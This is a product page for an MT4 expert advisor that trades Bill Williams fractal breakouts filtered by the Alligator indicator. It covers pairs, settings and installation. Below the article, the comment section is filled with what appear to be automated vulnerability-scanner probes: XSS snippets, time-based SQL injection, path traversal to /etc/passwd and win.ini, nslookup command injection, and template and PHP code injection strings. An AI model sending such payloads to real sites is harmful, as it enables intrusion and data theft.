Fractals & Alligator EA V1.0 MQ4 — Trend-Following Entries With Clear, Rule-Based Exits
If you’ve ever tried to “eyeball” fractal breaks while checking whether the Alligator is actually trending… yeah, that gets messy fast. Fractals & Alligator EA v1.0 MQ4 fixes that. It takes two classic Bill Williams concepts—market structure (fractals) and a multi-EMA trend filter (Alligator)—and turns them into a disciplined, automated playbook on MT4. No guesswork, no second-guessing; just consistent rules that fire the same way, every time.
Below, you’ll find what this EA does, how it decides to enter and exit, recommended pairs and timeframes, plus practical settings to start strong. Whether you’re new to automated strategies or you’ve been running EAs for years, this one aims to give you clean trend participation with straightforward risk control.
What This EA Is Designed To Do
The Fractals & Alligator EA hunts for moments when price confirms direction by breaking a recent fractal in line with an established trend. The Alligator indicator (Jaw/Teeth/Lips) defines when the market is trending and which way it’s flowing. The fractal breakout gives the trigger. You get a “structure-plus-trend” combo that tries to avoid chop and focus on higher-probability continuations.
Core idea in one line: ride trends after a fresh structure break, filtered by Alligator alignment, then manage risk with fixed or ATR-based stops and optional trailing logic.
Supported Pairs & Timeframes
This build focuses on four instruments with specific operating windows. You can expand later, but start here for the intended experience:
- GBPUSD: M30 and H4
- USDJPY: M15 and H1
- AUSCAD (AUDCAD): H1
- GBPJPY: M5
Why these? Volatility profiles and session behavior. GBP pairs give strong directional bursts around London; USDJPY often trends cleanly in Asian–London overlap; AUDCAD (typed as AUSCAD) can form steady cycles on H1. GBPJPY is fast—M5 entries keep the stop sizes reasonable while still catching momentum.
How The Strategy Works (Plain English)
1) Define the trend (Alligator):
- Bullish state: Lips (fast) > Teeth (medium) > Jaw (slow) and lines opening up (fanning).
- Bearish state: Lips < Teeth < Jaw and lines opening down.
- If lines are tangled, the EA stands down: no trend, no trade.
2) Wait for a structure signal (Fractals):
- A buy sets up when price breaks above the most recent upper fractal while Alligator shows a bullish state.
- A sell sets up when price breaks below the most recent lower fractal in a bearish state.
3) Confirm and execute:
- Optional filters may include: minimum candle body size, spread cap, news pause, session windows.
- When all conditions agree, the EA places a market order with your chosen risk model.
4) Manage the trade:
- Stop-loss: fixed pips or ATR-based, tucked beyond the broken fractal or a recent swing.
- Take-profit: fixed R-multiple (e.g., 1.5R–2R), structure target, or dynamic trailing.
- Exit filters: opposite fractal break, Alligator flip, or trailing exit when momentum slows.
Why Fractals + Alligator Can Work
- You filter early noise. The Alligator avoids entries when the market sleeps or chops.
- You wait for confirmation. The fractal breakout requires price to prove intent.
- You keep risk logic simple. Stops sit beyond recent structure; profits scale with volatility.
- You adapt to instrument's personality. Lower timeframes for fast pairs like GBPJPY; higher timeframes for smoother pairs like AUDCAD.
Nothing is magic—there will be whipsaws—but the combination is a well-known, transparent way to systematize trend participation.
Recommended Settings (Starter Baselines)
Use these as starting points, then forward-test and tune:
Risk & Money Management
- Per-trade risk: 0.5%–1.0% of equity to start.
- Max concurrent trades: 1–2 per symbol (avoid stacking too hard).
- Daily stop: optional—halt new entries after −2R or −3R.
Stops & Targets
- Stop-loss: ATR(14) × 1.5 on the trade timeframe, or the last opposing fractal plus a small buffer.
- Take-profit: 1.5R to 2R fixed, or ATR-based trailing stop that activates after 1R in profit.
- Breakeven move: after +1R, shift SL to entry; consider a small lock-in (+0.2R).
Filters
- Max spread: instrument-specific (e.g., GBPJPY ≤ 2.0 pips on your broker’s quote).
- Trading sessions:
- GBPUSD, GBPJPY: London + early New York.
- USDJPY: Asia + London overlap.
- AUDCAD: Asia to early London, skip late NY illiquidity.
- News pause: optional; stand down X minutes around high-impact releases.
Quality-of-Life
- One-chart deployment: option to trade only the attached symbol and timeframe for clarity.
- Magic number: unique per symbol/timeframe to avoid order mixups.
- Comment tags: enable for easy journal/review.
Pair-Specific Tips
GBPUSD (M30, H4):
- M30 captures intraday bursts; H4 smooths the ride and reduces noise.
- Consider a slightly wider ATR multiple on H4 to avoid premature exits.
USDJPY (M15, H1):
- M15 entries often benefit from a tighter spread cap.
- On H1, let winners breathe; a modest trailing stop can harvest longer swings.
AUSCAD / AUDCAD (H1):
- This cross can grind; don’t oversize.
- Session filter helps—avoid late NY when liquidity thins.
GBPJPY (M5):
- Fast and furious; keep risk small.
- Use a conservative trailing method or partial TP to bank profit quickly.
Backtesting & Forward-Testing Guidance
Before going live, do both:
- Backtest with real-tick data, realistic spreads, and variable commissions.
- Forward-test on demo during your intended sessions.
- Track metrics that matter: win rate, average R, max drawdown, profit factor, and longest losing streak. A trend EA can be streaky; your position size must survive cold patches.
Consistency beats curve-fit magic. If you tweak something, change one variable at a time and keep notes.
Installation (MT4 / MQ4)
- Copy the EA: place the
.mq4/.ex4intoMQL4/Experts. - Restart MT4 or hit Refresh in the Navigator.
- Open the chart for your chosen symbol/timeframe (e.g., GBPUSD M30).
- Attach the EA to the chart; enable Algo Trading.
- Input settings: risk %, ATR/SL/TP, spread cap, sessions, news pause.
- Journal check: confirm Magic Number and comment tags log correctly.
- Run the demo first, then go live with a small risk.
Risk Statement (Read This)
No EA wins all the time. Markets gap, spreads widen, and trends stall. Use conservative risk, monitor broker execution quality, and be ready to pause the system during abnormal volatility. Backtests guide expectations but do not predict the future.
Who Is This For?
- Swing and intraday traders who want rule-based entries in trending environments.
- Busy traders who like set-and-forget logic with clear stop rules.
- Data-driven testers who prefer strategies they can verify, tweak, and journal.
If you want a structured, transparent framework instead of “black-box” noise, Fractals & Alligator EA V1.0 MQ4 is a solid, no-nonsense place to start.
Final Thoughts
You get a simple promise: define the trend, confirm a structure break, place a measured bet, then let the system handle exits. It won’t catch every move (nothing does), but it aims to catch the clean ones with risk you can live with. Begin with the provided pairs and timeframes, keep risk tight, and iterate based on your data. That’s how you turn an EA from “interesting” into “reliable.”


Comments
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1CPBEU[!+!]
1
1
1mU0ec ZnKD(9131)
1}body{acu:Expre/**/SSion(ZnKD(9037))}
[url=http://www.vulnweb.com][/url]
1 src=x onerror=alert(9696);//
1
1\u003CScRiPt\ZnKD(9612)\u003C/sCripT\u003E
1<ScRiPt>ZnKD(9435)</sCripT>
1" onerror=alert(9997)>
%31%3C%53%63%52%69%50%74%20%3E%5A%6E%4B%44%289925%29%3C%2F%73%43%72%69%70%54%3E
1
1
1
1
1
1
1
1
1ZnKD(9113)
1ZnKD(9236)
1ZnKD(9213)
1ATEW7[!+!]
1ZnKD(9385)
{{9999539*10000261}}
1ZnKD(9983)
CWS000x
acux1913
acu2048<s1﹥s2ʺs3ʹuca2048
'"()&%ZnKD(9383)
19818728
1'"()&%ZnKD(9231)
1acuH5ySzjqn90
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1JIWK5[!+!]
1
1
1gA8Vy 511n(9825)
[url=http://www.vulnweb.com][/url]
1 src=x onerror=alert(9842);//
1}body{acu:Expre/**/SSion(511n(9926))}
1
%31%3C%53%63%52%69%50%74%20%3E%35%31%31%6E%289107%29%3C%2F%73%43%72%69%70%54%3E
1\u003CScRiPt\511n(9545)\u003C/sCripT\u003E
1<ScRiPt>511n(9557)</sCripT>
1
1
1" onerror=alert(9544)>
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1511n(9469)
1
1
1
1
1511n(9236)
1
1
1DW8SY[!+!]
1
1
1511n(9028)
1
1
1
1511n(9726)
1
1
CWS000x
1
1
{{9999902*9999248}}
1
1
1511n(9204)
1
1
1
acux2254
1
1
1
1
1
1
acu4144<s1﹥s2ʺs3ʹuca4144
1
1
1
1
1
1
1
1
1
1
1
1
1
19880557
1
1
1
1
1
1
1
1
1
1
/www.vulnweb.com
1
JyI=
'"
1
1
1
1
1
1
1
1'"()&%511n(9382)
1
1
1
1
1
1
'"()&%511n(9134)
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1'"
1
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
1
\
1
1
1
1
1
1
1
@@LDhfu
1
1
${@print(md5(acunetix_wvs_security_test))}
1
1
http://testasp.vulnweb.com/t/xss.html?%00.jpg
1
${@print(md5(acunetix_wvs_security_test))}\
1
1
1
1
1
1
1
1
http://hitppehJKhocA.bxss.me/
fractals-alligator-ea-v10-mq4
1
1
1
fractals-alligator-ea-v10-mq4
1
1
1
1
fractals-alligator-ea-v10-mq4/.
1
1
1
^(#$!@#$)(()))******
1
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
1
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
'"()
1
1
WEB-INF/web.xml
1
1
WEB-INF\web.xml
1
;print(md5(acunetix_wvs_security_test));
1
1
1
1
';print(md5(acunetix_wvs_security_test));$a='
1
1
1
";print(md5(acunetix_wvs_security_test));$a="
1
1
../../../../../../../../../../windows/win.ini.jpg
1
1
1
1
1
................windowswin.ini
1
1&n907463=v961348
1
..\..\..\..\..\..\..\..\windows\win.ini
)
1
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
!(()&&!|*|*|
1
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
1
1
WEB-INF/web.xml
1
1
/WEB-INF/web.xml
1
1
1
WEB-INF\web.xml
1
1
1
../../../../../../../../../../windows/win.ini
1
1
C:\WINDOWS\system32\drivers\etc\hosts
375'
1
1
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
1
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
..
1some_inexistent_file_with_long_name.jpg
1
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
Http://testasp.vulnweb.com/t/fit.txt
1
file:///etc/passwd
http://testasp.vulnweb.com/t/fit.txt?.jpg
1
1
testasp.vulnweb.com
1
1
/\../\../\../\../\../\../\../etc/passwd
/../..//../..//../..//../..//../..//etc/passwd.jpg
1
-1;select pg_sleep(6); --
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
1
-1);select pg_sleep(6); --
/etc/passwd
1
-1));select pg_sleep(9); --
12345'"\'\");|]*{
%2fetc%2fpasswd
1
mTgFR3qr';select pg_sleep(9); --
/.././.././.././.././.././.././.././../etc/./passwd%00
u2qL2c2X');select pg_sleep(9); --
${10000326+10000354}
D8IUypdb'));select pg_sleep(9); --
1
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/
set|set&set
0Yq7XvFq
../../../../../../../../../../etc/passwd
1
(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/
../../../../../../../../../../../../../../../proc/version
1
$(nslookup fEVwEEW0)
-1; waitfor delay '0:0:6' --
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
1
&nslookup fpKPXmQw&'\"`0&nslookup fpKPXmQw&`'
-1); waitfor delay '0:0:6' --
1
../../../../../../../../../../etc/passwd.jpg
1 waitfor delay '0:0:6' --
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
1
IO2NrZ6y'; waitfor delay '0:0:6' --
-1 OR 2+592-592-1=0+0+0+1 --
1
-1 OR 2+192-192-1=0+0+0+1
1
-1' OR 2+164-164-1=0+0+0+1 --
1
1
-1' OR 2+516-516-1=0+0+0+1 or 'diVBEGkb'='
-1" OR 2+653-653-1=0+0+0+1 --
1
response.write(9213388*9075677)
'+response.write(9213388*9075677)+'
1
"+response.write(9213388*9075677)+"
1
1
1
Leave a Comment